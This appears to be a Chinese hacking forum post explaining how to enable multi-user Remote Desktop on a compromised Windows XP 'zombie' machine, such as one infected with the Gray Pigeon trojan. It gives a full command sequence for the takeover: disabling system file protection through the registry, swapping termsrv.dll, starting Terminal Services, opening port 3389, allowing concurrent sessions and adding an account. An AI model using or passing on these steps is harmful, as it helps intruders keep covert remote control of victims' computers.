让XP肉鸡终端服务实现多用户登陆
条件:1肉鸡是XPP2的 2你可以上传文件 3可以执行命令 4肉鸡重启后不会丢! (你要是有鸽子肉鸡,上面的条件很好满足的嘛!)开工: 首先我们上传XPP2英文2055版的termsrv.dll文件,上传到C盘下, 然后干掉XP的系统文件保护,修改他的注册表(防止我们修改文件时弹出提示框来) echo Windows Registry Editor Version 5.00>>20.reg echo [HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows NT/CurrentVersion/Winlogon]>>20.reg echo "SFCDisable"=dword:ffffff9d>>20.reg 命令regedit /s 20.reg导入注册表 命令del 20.reg 删除
现在来替换文件(termsrv.dll文件系统里有2个,一个在dllcache文件夹里,一个在system32文件夹里 我们都替换掉) 命令:copy c:/termsrv.dll c:/windows/system32/dllcache/termsrv.dll 这个命令不用解释了吧,命令执行后有个提示,问你是否修改termsrv.dll文件,因为dllcache文件夹里有 一个termsrv.dll文件,选Y回车就可以了 再来替换system32下的termsrv.dll文件,你要是还直接还使用copy命令,肯定失败.提示文件在使用中. 我们来利用win系统的特性修改它,使用中的系统文件可以改名. 切换到system32目录 命令:rename termsrv.dll ter.dll 这个命令是把termsrv.dll文件改名为ter.dll<--这个名字可以随便改 命令:dir ter.dll 看看是否成功 命令:copy c:/termsrv.dll c:/windows/system32/termsrv.dll 把我们的termsrv.dll放到system32下 命令:dir termsrv.dll 查看一下 开启终端服务: 命令:sc config termservice start= auto 把终端服务状态改为自动,服务状态是禁用的话,你用net命令开可不起作用呦 启动服务命令:sc start termservice或net start termservice(这两个命令偶不喜欢,有时候不知道什么原因总不成功) 偶喜欢修改注册表: echo Windows Registry Editor Version 5.00>>3389.reg echo [HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Control/Terminal Server]>>3389.reg echo "fDenyTSConnections"=dword:00000000>>3389.reg echo [HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Control/Terminal Server/Wds/rdpwd/Tds/tcp]>>3389.reg echo "PortNumber"=dword:00000D3D>>3389.reg echo [HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Control/Terminal Server/WinStations/RDP-Tcp]>>3389.reg echo "PortNumber"=dword:000000D3D>>3389.reg 命令 regedit /s 3389.reg导入注册表 命令 del 3389.reg 删除 检查一下 命令: netstat -an |find "3389" 看看是否打开终端端口 最后还要修改注册表才能多用户登陆: echo Windows Registry Editor Version 5.00>>21.reg echo [HKEY_LOCAL_MACHINE/System/CurrentControlSet/Control/Terminal Server/Licensing Core]>>21.reg echo "EnableConcurrentSessions"=dword:00000001>>21.reg
命令regedit /s 21.reg导入注册表 命令del 21.reg 删除 重启肉鸡,肉鸡重启后,就会加载我们的termsrv.dll文件,(它原来的被我们改名了..嘎嘎) 等待肉鸡上线,就可以登陆了(不要忘了加个帐号哟)
